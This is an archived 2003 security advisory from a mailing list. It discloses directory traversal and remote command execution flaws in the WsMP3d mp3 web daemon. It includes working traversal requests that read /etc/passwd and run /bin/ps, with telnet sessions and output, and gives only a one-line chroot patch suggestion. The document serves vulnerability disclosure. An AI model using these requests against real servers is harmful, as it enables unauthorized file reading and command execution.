lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030521141310.3629.qmail@hackermail.com>
From: xploit at hackermail.com (dong-h0un U)
Subject: [INetCop Security Advisory] WsMP3d Directory Traversing
 Vulnerability.


	==========================================
	INetCop Security Advisory #2003-0x82-017.a
	==========================================


* Title: WsMP3d Directory Traversing Vulnerability


0x01. Description


WsMp3d is daemon that can enjoy mp3.
This daemon can approach in web, directory traversing bug exists.
Also, can execute command in remote.


0x02. Vulnerable Packages


Vendor site: http://wsmp3.sourceforge.net/

WsMp3-0.0.10.tar.gz version.
+Linux
WsMp3-0.0.9.tar.gz version.
WsMp3-0.0.8.tar.gz version.
web_server-0.0.7.tar.gz version.
web_server-0.0.6.tar.gz version.
web_server-0.0.5.tar.gz version.
web_server-0.0.4.tar.gz version.
web_server-0.0.3.tar.gz version.
web_server-0.0.2.tar.gz version.
web_server-0.0.1.tar.gz version.


0x03. Exploit


#1) Directory traversing exploit:

As following, see file in directory.

http://wsmp3.server.com/cmd:ls

In this way, use directory that know.

bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
GET /dir/../../../../../../etc/passwd HTTP/1.0

... passwd file here ...

Ok, it's possible to read `/etc/passwd' file !
If it's executed by root ?? hehehe ;-)

#2) Remote execute command exploit:

bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Date: Sat May 03 01:25:28 2003
Last-Modified: Sat May 03 01:25:28 2003
Content-Length: 201

  PID TTY          TIME CMD
29529 pts/2    00:00:00 login
29559 pts/2    00:00:00 su
29560 pts/2    00:00:00 bash
29681 pts/2    00:00:10 WsMp3
29730 pts/2    00:00:00 WsMp3
29731 pts/2    00:00:00 ps
Connection closed by foreign host.
bash$


0x04. Patch


It can solve as chroot() function. :-)


P.S: Sorry, for my poor english.

--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,
              xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org (Korean hacking game)
             My World: http://x82.i21c.net & http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--


-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Powered by Outblaze

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ